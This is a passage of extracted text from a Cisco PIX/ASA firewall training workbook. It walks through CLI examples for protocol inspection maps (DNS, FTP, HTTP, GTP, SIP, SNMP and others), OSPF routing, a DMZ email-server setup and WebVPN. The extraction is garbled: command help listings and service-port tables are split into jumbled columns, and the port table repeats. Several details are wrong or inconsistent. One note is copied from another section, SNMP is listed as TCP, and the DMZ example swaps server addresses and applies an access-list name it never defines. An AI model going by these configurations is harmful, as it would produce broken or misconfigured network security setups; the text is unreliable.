Some application protocols require the firewall to inspect the operation, as new ports may
be open in their usage. The firewall must thus open these to make the protocol work.
CTIQBE inspection supports the Cisco IP SoftwarePhone and other Cisco TAPI applications
with Cisco CallManager. These are used in many Voice-over-IP applications.
NetworkSims.com
577
Objectives
Define interesting CTIQBE traffic.

Define a policy map.
Define CTIQBE inspection.
Apply the policy map.
Example
# config t
pixfirewall(config-cmap)# match port tcp eq ?
<0-65535>
aol
bgp
chargen
cifs
citrix-ica
cmd
ctiqbe
daytime
discard
domain
echo
exec
finger
ftp
ftp-data
gopher
h323
hostname
http
https
ident
imap4
irc
kerberos
klogin
kshell
ldap
ldaps
login
lotusnotes
lpd
netbios-ssn
nntp
pcanywhere-data
pim-auto-rp
pop2
pop3
pptp
rsh
rtsp
sip
NetworkSims.com
578
smtp
sqlnet
ssh
sunrpc
tacacs
talk
telnet
uucp
whois
www
pixfirewall(config-cmap)# match port tcp eq 2748
pixfirewall(config-pmap-c)# inspect ?
ctiqbe
dns
esmtp
ftp
gtp
h323
http
icmp
ils
mgcp
netbios
pptp
rsh
rtsp
sip
skinny
snmp
sqlnet
sunrpc
tftp
xdmcp
pixfirewall(config-pmap-c)# inspect ctiqbe

Outline
DNS inspection guards against an incorrect return address used for a DNS query. This
prevents a proxy DNS attack, where an attacker sends multiple requests to a DNS server
with the return address of the machine that the attacker wishes to attack. The attacked
machine then receives multiple DNS replies, which it must service, and is likely to reduct
the performance of the machine.
Objectives
NetworkSims.com
579
Define interesting DNS traffic (UDP port 53).

Define DNS inspection.
Example
# config t
pixfirewall(config-cmap)# match port udp eq 53
pixfirewall(config-pmap-c)# inspect dns ?
maximum-length Maximum DNS packet length
<cr>
pixfirewall(config-pmap-c)# inspect dns max-length ?
<512-65535> Enter maximum DNS packet length
pixfirewall(config-pmap-c)# inspect dns max 1500

Outline
FTP inspection allows the firewall to setup the data connection, and tracks the FTP
command responses for possibly invalid commands. It can also create an audit trail and
embedded NAT information in the IP address. The strict part of the inspection command
applies FTP restrictions from an FTP map.
Objectives
Define interesting FTP traffic (TCP port 21).

Define an FTP map.
Define FTP inspection.
Example
NetworkSims.com
580
# config t
pixfirewall(config)# ftp-map ftest
no
pixfirewall(config-ftp-map)# request-command ?
pixfirewall(config-ftp-map)# request-command deny ?
ftp-map
appe
cdup
dele
get
help
mkd
put
rmd
rnfr
rnto
site
stou
Append to a file
Change to parent of current directory
Delete a file at server site
Help information from server
Create a directory
Remove a directory
Rename from
Rename to
Specify server specific command
Store a file with a unique name
pixfirewall(config-ftp-map)# request-command deny cdup

pixfirewall(config-pmap-c)# inspect ftp ?
strict Prevent web browsers from sending embedded commands
in FTP requests
<cr>
pixfirewall(config-pmap-c)# inspect ftp strict ?
WORD < 64 char Optional ftp-map name
<cr>
pixfirewall(config-pmap-c)# inspect ftp strict ftest

Outline
GTP allows data to be tunneled through a GSM network (UMTS/GPRS). GTP inspection
allows the firewall to check the details of these connections.
NetworkSims.com
581
Objectives
Define interesting GTP traffic (UDP ports 3386 and 2123).

Define a GTP map.
Define GTP inspection.
Note: An access-list is required in this case, instead of a match command in the class-map,
as there are more than one protocol. Only the tunnel-group allows to match more than one
protocol. Thus we need an access-list to identify ports 2123 and 3386.
Example
# config t
pixfirewall(config)# access-list atest permit udp any any eq 2123
access-list
any
Match any packet
ctiqbe----tcp--2748
ftp-------tcp--21
h323-h225-tcp--1720
http------tcp--80
ils-------tcp--389
rsh-------tcp--514
sip-------tcp--5060
skinny----tcp--2000
sqlnet----tcp--1521
xdmcp-----udp--177
traffic:
dns-------udp--53
gtp-------udp--2123,3386
h323-ras--udp--1718-1719
icmp------icmp
mgcp------udp--2427,2727
rpc-------udp--111
rtsp------tcp--554
sip-------udp--5060
smtp------tcp--25
tftp------udp--69
dscp
flow
Flow based Policy
port
precedence
Match IP precedence
rtp
tunnel-group
pixfirewall(config-cmap)# match access-list atest
pixfirewall(config)# gtp-map gtest
pixfirewall(config-gtp-map)# ?
NetworkSims.com
582
description
GRP configuration map description
drop
Message ID, APN or GTP version to drop
help
Displays help
mcc
Three-digit mobile code (000-999)
message-length Message length max and min values
permit errors
Permits packets with errors
permit response Permit GSN loading balance
request-queue
Maximum requests for the queue
timeout
Idle timeout
tunnel-limit
Maximum number of tunnels
pixfirewall(config-gtp-map)# request-queue 100
pixfirewall(config-gtp-map)# mcc 044
pixfirewall(config-gtp-map)# message-length min 10 max 1000
pixfirewall(config-gtp-map)# tunnel-limit 10000
pixfirewall(config-gtp-map)# exit
pixfirewall(config-pmap-c)# inspect gtp gtest

Outline
H.323 is a wide ranging protocol suite which supports many types of video and voice
communications.
Objectives
Define interesting H.323 traffic (UDP ports 1720 and 1720).

Define H.323 inspection.
Note: An access-list is required in this case, instead of a match command in the class-map,
as there are more than one protocol. Only the tunnel-group allows to match more than one
protocol. Thus we need an access-list to identify ports 2123 and 3386.
Example
# config t
NetworkSims.com
583

access-list
any
Match any packet
ctiqbe----tcp--2748
ftp-------tcp--21
h323-h225-tcp--1720
http------tcp--80
ils-------tcp--389
rsh-------tcp--514
sip-------tcp--5060
skinny----tcp--2000
sqlnet----tcp--1521
xdmcp-----udp--177
traffic:
dns-------udp--53
gtp-------udp--2123,3386
h323-ras--udp--1718-1719
icmp------icmp
mgcp------udp--2427,2727
rpc-------udp--111
rtsp------tcp--554
sip-------udp--5060
smtp------tcp--25
tftp------udp--69
dscp
flow
Flow based Policy
port
precedence
Match IP precedence
rtp
tunnel-group
pixfirewall(config-pmap-c)# inspect h323 ?
h225 Enable H.225 signalling inspection
ras
Enable RAS inspection
pixfirewall(config-pmap-c)# inspect h323 ras
pixfirewall(config-pmap-c)# inspect h323 h225

Outline
HTTP inspection allows the firewall to detect possible malisousness in the HTTP protocol.
Objectives

Define HTTP inspection.
NetworkSims.com
584
Example
# config t
pixfirewall(config-cmap)# match tcp port eq 80
pixfirewall(config)# http-map htest
pixfirewall(config-http-map)# ?
Http-map configuration commands:
content-length
Content length range inspection
content-type-verification Content type inspection
max-header-length
Maximum header size inspection
max-uri-length
Maximum URI size inspection
no
port-misuse
Application inspection
request-method
Request method inspection
strict-http
Strict HTTP inspection
transfer-encoding
Transfer encoding inspection
pixfirewall(config-http-map)# content-l ?
http-map mode commands/options:
max Maximum content length allowed
min Minimum content length allowed
pixfirewall(config-http-map)# content-l min ?
<1-65535> Number of bytes
pixfirewall(config-http-map)# content-l min 1 ?
action Action taken when a violation occurs
max
Maximum content length allowed
pixfirewall(config-http-map)# content-l min 1 max ?
<1-50000000> Number of bytes
pixfirewall(config-http-map)# content-l min 1 max 1000 ?
pixfirewall(config-http-map)# content-l min 1 max 1000 action ?
allow Allow the message
drop
Close the connection
reset Close the connection with a TCP reset message
pixfirewall(config-http-map)# content-l min 10 max 1000 action reset
pixfirewall(config-http-map)# content-type-verification ?
action
Action taken when a violation occurs
match-req-rsp Check response matches ACCEPT value in request message
pixfirewall(config-http-map)# content-type-verification match ?
NetworkSims.com
585
pixfirewall(config-http-map)# content-type-verification match action ?

http-map
allow
drop
reset
Allow the message
Close the connection
Close the connection with a TCP reset message
pixfirewall(config-http-map)# content-type-verification match action reset ?

log Generate a log message
<cr>
pixfirewall(config-http-map)# content-type-verification match action reset log ?
<cr>
pixfirewall(config-http-map)# content-type-verification match action reset log
pixfirewall(config-http-map)# max-header-length request 100 action reset log
pixfirewall(config-http-map)# max-uri 100 action reset log
pixfirewall(config-http-map)# exit
pixfirewall(config-pmap-c)# inspect http htest
NetworkSims.com
586
10 TCP/IP services reference

Port
1
9
13
17
19
23
37
42
53
67
68
70
79
87
95
102
107
110
113
117
123
138
143
162
164
178
191
199
202
206
213
372
513
514
517
520
526
531
Service
Comment
TCPmux
discard
Null
daytime
qotd
Quote
chargen
ttytst source
telnet
time
Timserver
nameserver IEN 116
domain
DNS
bootps
BOOTP server
bootpc
BOOTP client
gopher
Internet Gopher
finger
link
Ttylink
supdup
iso-tsap
ISODE
rtelnet
Remote Telnet
pop3
POP version 3
auth
Rap ID
uucp-path
ntp
Network Timel
netbios-dgmNETBIOS
imap2
snmp-trap SNMP trap
cmip-agent
nextstep
NeXTStep
prospero
smux
SNMP Multiplexer
at-nbp
AppleTalk name binding
at-zis
AppleTalk zone information
ipx
IPX
ulistserv
UNIX Listserv
who
Whod
syslog
talk
route
RIP
tempo
Newdate
conference Chat
Port
7
11
15
18
21
25
39
43
57
67
69
77
80
88
101
105
109
111
115
119
137
139
161
163
177
179
194
201
204
210
220
512
514
515
518
525
530
532
Service Comment
echo
systat
Users
netstat
msp
Message send protocol
ftp
smtp
Mail
rlp
Resource location
whois
Nicname
mtp
Deprecated
bootps
tftp
rje
Netrjs
www
WWW HTTP
kerberos Kerberos v5
hostnames
csnet-ns CSO name server
pop2
POP version 2
sunrpc
sftp
nntp
USENET
netbios-ns NETBIOS Name Service
netbios-ssn
NETBIOS session
snmp
SNMP
cmip-man ISO management over IP
xdmcp
X Display Manager
bgp
BGP
irc
Internet Relay Chat
at-rtmp
AppleTalk routing
at-echo AppleTalk echo
z3950
NISO Z39.50 database
imap3
Interactive Mail Access
exec
Comsat 513 login
shell
No passwords used
printer
Line printer spooler
ntalk
timed
Timeserver
courier
Rpc
netnews Readnews

Outline
MGCP is a protocol which uses media gateways to provide trunks for the transmission of
audio from telephone exchanges over the Internet. This challenge involves defining MGCP
inspection.
Objectives
NetworkSims.com
587
Define interesting traffic (normally UDP ports 2427 and 2727).

Define MGCP inspection.
Example
# config t
# config t
pixfirewall(config)# mgcp-map mtest
call-agent
Add a Call-Agent
gateway
Add a Gateway
help
no
pixfirewall(config-mgcp-map)# call-agent ?
A.B.C.D IP address
pixfirewall(config-mgcp-map)# call-agent 1.2.3.4 ?
<0-2147483647> ID of the group
pixfirewall(config-mgcp-map)# call-agent 1.2.3.4 111
pixfirewall(config-mgcp-map)# command-limit ?
<1-2147483647> Command limit
pixfirewall(config-mgcp-map)# command-limit 100
pixfirewall(config-mgcp-map)# gateway ?
A.B.C.D IP address
pixfirewall(config-mgcp-map)# gateway 1.2.3.5 111
pixfirewall(config-mgcp-map)# exit
pixfirewall(config-pmap-c)# inspect mgcp mtest
NetworkSims.com
588

Outline
RTSP is used in streaming audio and video applications, such as for RealPlayer.
Objectives
Define interesting traffic (normally UDP ports 554 and 8554).

Define RTSP inspection.
Example
# config t
pixfirewall(config)# access-list atest permit tcp any any eq 554
pixfirewall(config-pmap-c)# inspect rtsp

Outline
SIP is used for voice-over-IP applications. This challenges involves SIP inspections.
Objectives
Define interesting traffic (normally TCP port 5060).

Define SIP inspection.
NetworkSims.com
589

Define SIP timeout.
Example
# config t
pixfirewall(config-pmap-c)# inspect sip
pixfirewall(config)# timeout ?
conn
Configure idle time after which a TCP connection state
will be closed, default is 1:00:00
h225
Configure idle time after which an H.225 signaling conn
h323
Configure idle time after which an H.323 control connection
icmp
Configure idle timeout for ICMP, default is 0:00:02
mgcp
Configure idle time after which an MGCP media connection
mgcp-pat
Configure the time after which an MGCP PAT Xlate
will be removed, default is 0:05:00
sip
Configure idle time after which a SIP control connection
sip_media
Configure idle time after which a SIP Media connection
sunrpc
Configure idle time after which a SUNRPC slot
uauth
Configure idle time after which an authentication will no
longer be cached and the user will need to re-authenticate on
their connection, default is 0:05:00. The default uauth timer
is absolute.
udp
Configure idle time after which general UDP states
will be closed, default is 0:02:00, This timer does not
apply to DNS or SUNRPC
xlate
Configure idle time after which a dynamic address
will be returned to the free pool, default is 3:00:00
pixfirewall(config)# timeout sip ?
0:0:0 | <0:5:0> - <1192:59:59>
<0-0>
Idle time after which a SIP control

connection will be closed, default is 0:30:00
pixfirewall(config)# timeout sip 0:15:00
Also:
NetworkSims.com
590
pixfirewall(config)# timeo sip_media ?

0:0:0 | <0:1:0> - <1192:59:59>
<0-0>
Idle time after which a SIP Media connection


Outline
SCCP (Skinny) is a simple protocol using in voice-over-IP applications. This challenges
involves SCCP inspections.
Objectives

Define SCCP inspection.
Example
# config t
pixfirewall(config-pmap-c)# inspect skinny

Outline
SMTP is used to send email from a client to an SMTP server. It can be the source of attack,
such as sending incorrectly formatted SMTP commands. Example commands are DATA,
HELO, MAIL, SEND, and so on. SMTP inspection allows the firewall to check for incorrectly
formated SMTP messages. This includes:
NetworkSims.com
591
Limiting to seven basic SMTP commands, plut the eight extended ones.
Montoring the command-response phase, so that messages are not send out-ofsequence.
Catches truncated commands.
Catches commands without a carridge-return/line-feed sequence.
And so on.
Objectives

Define SMTP inspection.
Example
# config t
pixfirewall(config-pmap-c)# inspect esmtp
NetworkSims.com
592

Port
1
9
13
17
19
23
37
42
53
67
68
70
79
87
95
102
107
110
113
117
123
138
143
162
164
178
191
199
202
206
213
372
513
514
517
520
526
531
Service
Comment
TCPmux
discard
Null
daytime
qotd
Quote
chargen
ttytst source
telnet
time
Timserver
nameserver IEN 116
domain
DNS
bootps
BOOTP server
bootpc
BOOTP client
gopher
Internet Gopher
finger
link
Ttylink
supdup
iso-tsap
ISODE
rtelnet
Remote Telnet
pop3
POP version 3
auth
Rap ID
uucp-path
ntp
Network Timel
netbios-dgmNETBIOS
imap2
snmp-trap SNMP trap
cmip-agent
nextstep
NeXTStep
prospero
smux
SNMP Multiplexer
at-nbp
at-zis
ipx
IPX
ulistserv
UNIX Listserv
who
Whod
syslog
talk
route
RIP
tempo
Newdate
conference Chat
Port
7
11
15
18
21
25
39
43
57
67
69
77
80
88
101
105
109
111
115
119
137
139
161
163
177
179
194
201
204
210
220
512
514
515
518
525
530
532
Service Comment
echo
systat
Users
netstat
msp
ftp
smtp
Mail
rlp
Resource location
whois
Nicname
mtp
Deprecated
bootps
tftp
rje
Netrjs
www
WWW HTTP
hostnames
pop2
POP version 2
sunrpc
sftp
nntp
USENET
netbios-ssn
NETBIOS session
snmp
SNMP
xdmcp
X Display Manager
bgp
BGP
irc
Internet Relay Chat
at-rtmp
AppleTalk routing
z3950
imap3
exec
Comsat 513 login
shell
No passwords used
printer
ntalk
timed
Timeserver
courier
Rpc
netnews Readnews

Outline
SNMP is used to gain information from networked devices. Unfortunately there are security
problems with early versions of it, where plain text values for the access parameters are sent
over the network. In this example SNMP Version 1 is blocked by the firewall.
Objectives
NetworkSims.com
593
Define interesting traffic (normally TCP port 161 and 162).

Define an SNMP map.
Define SNMP inspection.
Example
# config t
pixfirewall(config)# snmp-map stest
pixfirewall(config-snmp-map)# ?
snmp-map configuration commands:
deny Deny SNMP traffic
help Help for snmp-map configuration commands
no
pixfirewall(config-snmp-map)# deny ?
snmp-map mode commands/options:
version Specify the version to deny
pixfirewall(config-snmp-map)# deny version ?
snmp-map mode commands/options:
1
SNMP version 1
2
SNMP version 2 (party based)
2c SNMP version 2c (community based)
3
SNMP version 3
pixfirewall(config-snmp-map)# deny version ?
pixfirewall(config-snmp-map)# exit
pixfirewall(config-pmap-c)# inspect snmp stest
NetworkSims.com
594

Port
1
9
13
17
19
23
37
42
53
67
68
70
79
87
95
102
107
110
113
117
123
138
143
162
164
178
191
199
202
206
213
372
513
514
517
520
526
531
Service
Comment
TCPmux
discard
Null
daytime
qotd
Quote
chargen
ttytst source
telnet
time
Timserver
nameserver IEN 116
domain
DNS
bootps
BOOTP server
bootpc
BOOTP client
gopher
Internet Gopher
finger
link
Ttylink
supdup
iso-tsap
ISODE
rtelnet
Remote Telnet
pop3
POP version 3
auth
Rap ID
uucp-path
ntp
Network Timel
netbios-dgmNETBIOS
imap2
snmp-trap SNMP trap
cmip-agent
nextstep
NeXTStep
prospero
smux
SNMP Multiplexer
at-nbp
at-zis
ipx
IPX
ulistserv
UNIX Listserv
who
Whod
syslog
talk
route
RIP
tempo
Newdate
conference Chat
Port
7
11
15
18
21
25
39
43
57
67
69
77
80
88
101
105
109
111
115
119
137
139
161
163
177
179
194
201
204
210
220
512
514
515
518
525
530
532
Service Comment
echo
systat
Users
netstat
msp
ftp
smtp
Mail
rlp
Resource location
whois
Nicname
mtp
Deprecated
bootps
tftp
rje
Netrjs
www
WWW HTTP
hostnames
pop2
POP version 2
sunrpc
sftp
nntp
USENET
netbios-ssn
NETBIOS session
snmp
SNMP
xdmcp
X Display Manager
bgp
BGP
irc
Internet Relay Chat
at-rtmp
AppleTalk routing
z3950
imap3
exec
Comsat 513 login
shell
No passwords used
printer
ntalk
timed
Timeserver
courier
Rpc
netnews Readnews

Outline
RPC is used mainly in UNIX-based systems to remotely invoke services on servers, such as
for file access, and so on. It uses NFS (for file services) and NIS (for domain control). When a
client requires a service it sends an RPC program number over TCP port 111. On RPC
interception, the firewall intercepts the connection, and checks the details.
NetworkSims.com
595
Objectives

Define RPC inspection.
Define an Sun RPC table.
Example
# config t
pixfirewall(config-pmap-c)# inspect rpc
The firewall can create an RPC services table to control Sun RPC traffic through the security
appliance with:
pixfirewall(config)# sunrpc ?
Inf2
Inside
Outside
pixfirewall(config)# sunrpc inside ?
Hostname or A.B.C.D IP address of SUNRPC server
pixfirewall(config)# sunrpc inside 1.2.3.4 ?
A.B.C.D The network mask to be applied to IP address
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 ?
service Specify the SUNRPC service program number after this keyword
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service ?
<0-2147483647> SUNRPC service program number
NetworkSims.com
596
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service 100004 ?

protocol SUNRPC transport protocol to be used
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service 100004 p ?
tcp TCP to be used as transport protocol
udp UDP to be used as transport protocol
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service 100004 p t ?
port Configure SUNRPC port range after this keyword
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service 100004 p t p ?
highs
Keyword indicating port range 1024-65535
lows
Keyword indicating port range 1-1023
Enter the port or port range <start>[-<end>]
aol
bgp
chargen
cifs
citrix-ica
cmd
ctiqbe
daytime
discard
domain
echo
exec
finger
ftp
ftp-data
gopher
h323
hostname
http
https
ident
imap4
irc
kerberos
klogin
kshell
ldap
ldaps
login
lotusnotes
lpd
netbios-ssn
nntp
pcanywhere-data
pim-auto-rp
pop2
pop3
pptp
rsh
rtsp
sip
NetworkSims.com
597
smtp
sqlnet
ssh
sunrpc
tacacs
talk
telnet
uucp
whois
www
<start>[-<end>]
Enter a specific port (0-65535) or a range of ports
pixfirewall(config)# sunrpc inside 1.2.3.4 255.255.255.0 service 100004 protocol

tcp port 111
NetworkSims.com
598

Port
1
9
13
17
19
23
37
42
53
67
68
70
79
87
95
102
107
110
113
117
123
138
143
162
164
178
191
199
202
206
213
372
513
514
517
520
526
531
Service
Comment
TCPmux
discard
Null
daytime
qotd
Quote
chargen
ttytst source
telnet
time
Timserver
nameserver IEN 116
domain
DNS
bootps
BOOTP server
bootpc
BOOTP client
gopher
Internet Gopher
finger
link
Ttylink
supdup
iso-tsap
ISODE
rtelnet
Remote Telnet
pop3
POP version 3
auth
Rap ID
uucp-path
ntp
Network Timel
netbios-dgmNETBIOS
imap2
snmp-trap SNMP trap
cmip-agent
nextstep
NeXTStep
prospero
smux
SNMP Multiplexer
at-nbp
at-zis
ipx
IPX
ulistserv
UNIX Listserv
who
Whod
syslog
talk
route
RIP
tempo
Newdate
conference Chat
Port
7
11
15
18
21
25
39
43
57
67
69
77
80
88
101
105
109
111
115
119
137
139
161
163
177
179
194
201
204
210
220
512
514
515
518
525
530
532
Service Comment
echo
systat
Users
netstat
msp
ftp
smtp
Mail
rlp
Resource location
whois
Nicname
mtp
Deprecated
bootps
tftp
rje
Netrjs
www
WWW HTTP
hostnames
pop2
POP version 2
sunrpc
sftp
nntp
USENET
netbios-ssn
NETBIOS session
snmp
SNMP
xdmcp
X Display Manager
bgp
BGP
irc
Internet Relay Chat
at-rtmp
AppleTalk routing
z3950
imap3
exec
Comsat 513 login
shell
No passwords used
printer
ntalk
timed
Timeserver
courier
Rpc
netnews Readnews

Outline
This challenge involves redistributed OSPF processes from one to another.
Objectives
NetworkSims.com
599
Define a route-map.
Define redistribution.
Example
# config t
(config)# route-map ?
WORD < 58 char Route map tag
(config)# route-map rtest ?
<0-65535> Sequence to insert to/delete from existing route-map entry
deny
Route map denies set operations
permit
Route map permits set operations
<cr>
(config)# route-map rtest permit
exit
help
Interactive help for route-map subcommands
match Match values from routing table
no
Negate a command
set
(config-route-map)# match ?
route-map mode commands/options:
interface
ip
Match IP address or next-hop or route-source
metric
route-type Match route-type of route
(config-route-map)# match metric ?
<0-4294967295> Metric value
(config-route-map)# match metric 1
(config-route-map)# set ?
metric
Set metric value for destination routing protocol
metric-type Set type of metric for destination routing protocol
(config-route-map)# set metric- ?
type-1 OSPF external type 1 metric
(config-route-map)# set metric- type-1
(config-route-map)# set metric ?
NetworkSims.com
600

(config-router)# redistribute ?
connected Connected
ospf
static
Static routes
(config-router)# redistribute ospf 1 ?
match
Redistribution of OSPF routes
metric
Metric for redistributed routes
metric-type Set OSPF exterior metric type for redistributed routes
route-map
Route map reference
subnets
Consider subnets for redistribution into OSPF
tag
Set tag for routes redistributed into OSPF
<cr>
(config-router)# redistribute ospf 1 route-map ?
WORD Pointer to route-map entries
(config-router)# redistribute ospf 1 route-map rtest ?
match
metric
subnets
tag
<cr>
(config-router)# redistribute ospf 1 route-map rtest

Outline
This challenge involves configuring OSPF routing
Objectives
Define OSPF.
Define E1 OSPF parameters.
Example
NetworkSims.com
601
(config)# int e1
(config-if)# ospf cost 20
(config-if)# ospf retransmit-interval 20
(config-if)# ospf transmit-delay 20
(config-if)# ospf priority 20
(config-if)# ospf hello-interval 20
(config-if)# ospf dead-interval 20
(config-if)# ospf authentication-key test
(config-if)# ospf message-digest-key 1 md5 test
(config-if)# ospf authentication message-digest

Outline
This challenge involves configuring OSPF routing area details.
Objectives
Define OSPF.
Define OSPF routing area details.
Define OSPF stub details.
Define route timers.
Define default route.
Define logging of neighbors.
Outline
(config)# router
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config-router)#
(config-router)#
ospf 111
area 1 authentication
area 1 authentication message-digest
area 10 stub
area 10 default-cost 15
summary-address 1.2.3.0 255.255.0.0
area 10 range 2.3.4.0 255.255.0.0
default-information originate always
log-adj-changes detail
timers spf 10 10
Example
pixfirewall(config)# router ospf 111
pixfirewall(config-router)# ?
area
NetworkSims.com
602
compatible
default-information
distance
exit
help
ignore
log-adj-changes
neighbor
network
no
redistribute
router-id
summary-address
timers

Negate a command
pixfirewall(config-router)# area ?
A.B.C.D
pixfirewall(config-router)# area 1 ?
default-cost
filter-list
nssa
Specify a NSSA area
range
stub
Specify a stub area
virtual-link
<cr>
pixfirewall(config-router)# area 1 authentication
pixfirewall(config-router)# area 1 authentication ?
<cr>
pixfirewall(config-router)# area 1 authentication message-digest
pixfirewall(config-router)# area 10 stub
pixfirewall(config-router)# area 10 default-cost ?
<0-65535> Stub's advertised external route metric
pixfirewall(config-router)# area 10 default-cost 15
Route summarization allows for various routes to summarized into a single address, and
help to reduce the size of the routing tables:
pixfirewall(config-router)# summary-address ?
A.B.C.D IP summary address
pixfirewall(config-router)# summary-address 1.2.3.0 ?
A.B.C.D Summary mask
pixfirewall(config-router)# summary-address 1.2.3.0 255.255.0.0
NetworkSims.com
603
To summarize between OSPF areas:

pixfirewall(config-router)# area 10 range ?
pixfirewall(config-router)# area 10 range 2.3.4.0 ?
A.B.C.D IP mask for address
pixfirewall(config-router)# area 10 range 2.3.4.0 255.255.0.0
To generate a default route:

pixfirewall(config-router)# default-information ?
originate Distribute a default route
pixfirewall(config-router)# default-information originate ?
always
Always advertise default route
metric
OSPF default metric
metric-type OSPF metric type for default routes
route-map
Route-map reference
<cr>
pixfirewall(config-router)# default-information originate always
pixfirewall(config-router)# log-adj-changes ?
detail Log all state changes
<cr>
pixfirewall(config-router)# log-adj-changes detail
For OSPF timers:

pixfirewall(config-router)# timers ?
lsa-group-pacing OSPF LSA group pacing timer
spf
OSPF SPF timers
pixfirewall(config-router)# timers spf ?
<1-65535> Delay between receiving a change to SPF calculation
pixfirewall(config-router)# timers spf 10 ?
<1-65535> Hold time between consecutive SPF calculations
pixfirewall(config-router)# timers spf 10 10
NetworkSims.com
604
Cisco PIX Test

Outline
This challenge involves taking a PIX test.

Outline
This challenge involves configurating external access to an email server on the DMZ.
Objectives
Define fixup for SMTP.

Define access-list to allow access to the email server.
Define a static mapping between the email server and an outside address.
Apply the access-list.
Define MAC addresses for the ports (just in case they are used on other devices).
Example
In the following example, the addresses of the ports are:
E0 (outside) 10.0.0.1
E1 (inside) 192.168.0.1
E2 (dmz) 172.16.10.1
The email server is at 172.16.10.2 and will be mapped to 10.0.0.3 for external access.
The default gateway is at 10.0.0.2
(config)# fixup protocol smtp 25
(config)# int e0
(config-if)# exit
(config)# int e0
(config-if)# exit
NetworkSims.com
605
(config)# int e2
(config-if)# nameif dmz
(config-if)# exit
Next permit access from the outside interface to the Email server:
(config)#access-list outside_int permit tcp any host 10.0.0.3 eq smtp
Allow all outgoing connections from the Email server to external nodes:
(config)# access-list dmz_interface permit tcp host 172.16.10.2 any eq smtp
Map the Email server on the DMZ, which is at 172.16.0.2, and let its
accessible address be 10.0.0.3:
(config)# static (dmz,outside) 10.0.0.3 172.16.0.2
Apply the access-lists:

(config)# access-group outside_interface in interface outside
(config)# access-group dmz_interface in interface dmz
NetworkSims.com
606
14 ASA/New PIX
Outline
This challenge involves configurating external access to an email server on the DMZ.
Objectives
Define fixup for SMTP.

Define access-list to allow access to the email server.
Define a static mapping between the email server and an outside address.
Apply the access-list.
Define MAC addresses for the ports (just in case they are used on other devices).
Example
In the following example, the addresses of the ports are:
E0 (outside) 10.0.0.1
E1 (inside) 192.168.0.1
E2 (dmz) 172.16.10.1
The email server is at 172.16.10.2 and will be mapped to 10.0.0.3 for external access.
The default gateway is at 10.0.0.2
(config)# fixup protocol smtp 25
(config)# int e0
(config-if)# exit
(config)# int e0
(config-if)# exit
(config)# int e2
(config-if)# nameif dmz
NetworkSims.com
607

(config-if)# exit
Next permit access from the outside interface to the Email server:
(config)#access-list outside_int permit tcp any host 10.0.0.3 eq smtp
Allow all outgoing connections from the Email server to external nodes:
(config)# access-list dmz_interface permit tcp host 172.16.10.2 any eq smtp
Map the Email server on the DMZ, which is at 172.16.0.2, and let its
accessible address be 10.0.0.3:
(config)# static (dmz,outside) 10.0.0.3 172.16.0.2
Apply the access-lists:

(config)# access-group outside_interface in interface outside
(config)# access-group dmz_interface in interface dmz

Outline
This challenge involves configuring WebVPN, which supports a secure, remote-access VPN
tunnel to the security device using a web browser. There is thus no need for any special
software or hardware clients. It can be used in a number of applications such as for internal
websites, Web-enabled applications, secure directory shares, secure email, and so on. It also
uses SLA (Service Level Agreement) which monitors a remote IP address. In this case a
static IP address is used.
Objectives
Define the E0 name, IP address and subnet mask.

Define WebVPN port.
Define WebVPN on the outside interface.
Define an SLA for a remote host on a certain interface.
Commands
(config)# int e0
(config-if)# nameif newjersey
NetworkSims.com
608
(config-if)# exit
(config)# webvpn
(config-webvpn)# port 444
(config-webvpn)# enable newjersey
(config-webvpn)# exit
(config)# sla mon 1
(config-sla-monitor)# t e p i 1.2.3.4 i newjersey
(config-sla-monitor-echo)# ?
Example
(config)# int e0
(config-if)# nameif newjersey
(config-if)# exit
(config)# webvpn
(config-webvpn)# ?
WebVPN commands:
apcf
authorization-dn-attributes
authorization-required
auto-signon
cache
character-encoding
csd
customization
default-idle-timeout
enable
exit
file-encoding
help
http-proxy
https-proxy
java-trustpoint
memory-size
no
port
port-forward
proxy-bypass
rewrite
sso-server
svc
tunnel-group-list
url-list
Load Application Profile Customization Framework

(APCF) profile
The DN of the peer certificate used as username
for authorization
Require users to authorize successfully in order
to connect
Auto signon
Configure WebVPN cache
Configures the character encoding for WebVPN
portal pages
This specifies whether Cisco Secure Desktop is
enabled and the package file name to be used.
Configure WebVPN GUI Customization object
This is the default idle timeout in seconds
Enable WebVPN on the specified interface
Exit from WebVPN configuration mode
Configures the file encoding for a file sharing
server
Help for WebVPN commands
This is the proxy server to use for HTTP
requests
This is the proxy server to use for HTTPS
requests
Configure WebVPN java trustpoint
Configure WebVPN memory size
Remove a WebVPN command or set to its default
WebVPN should listen for connections on the
specified port
Configure the port-forward list for WebVPN
Configure proxy bypass
Configure content rewriting rule
Configure an SSO Server
This specifies whether the SSL VPN Client is
enabled and the package file name to be used.
Configure WebVPN group list dropdown in login
page
Configure a list of URLs for use with WebVPN
(config-webvpn)# port ?
webvpn mode commands/options:
<1-65535> The WebVPN server's SSL listening port. TCP port 443 is the
default.
NetworkSims.com
609
(config-webvpn)# port 444

(config-webvpn)# enable ?
webvpn mode commands/options:
inf2
inside
newjersey Name of interface Ethernet0
(config-webvpn)# enable newjersey
(config-webvpn)# exit
(config)# sla ?
monitor IP Service Level Agreement Monitor
(config)# sla mon ?
<1-2147483647> Entry Number
schedule
IP SLA Monitor Entry Scheduling
(config)# sla mon 1
(config-sla-monitor)# ?
IP SLA Monitor entry configuration commands:
exit Exit operation configuration
type Type of entry
(config-sla-monitor)# type ?
sla-monitor mode commands/options:
echo Echo Operation
(config-sla-monitor)# type echo ?
protocol Protocol to Use for Operations
(config-sla-monitor)# type echo ipicmpecho ?
ipIcmpEcho Use IP/ICMP
(config-sla-monitor)# t e p i ?
Hostname or A.B.C.D IP address or hostname
(config-sla-monitor)# t e p i 1.2.3.4 ?
interface Interface keyword
(config-sla-monitor)# t e p i 1.2.3.4 i ?
inf2
inside
NetworkSims.com
610
newjersey Name of interface Ethernet0

(config-sla-monitor)# type echo protocol ipicmpecho 1.2.3.4 interface newjersey
IP SLA Monitor Echo Configuration Commands:
default
exit
Exit probe configuration
frequency
Frequency of an operation
no
num-packets
Number of Packets
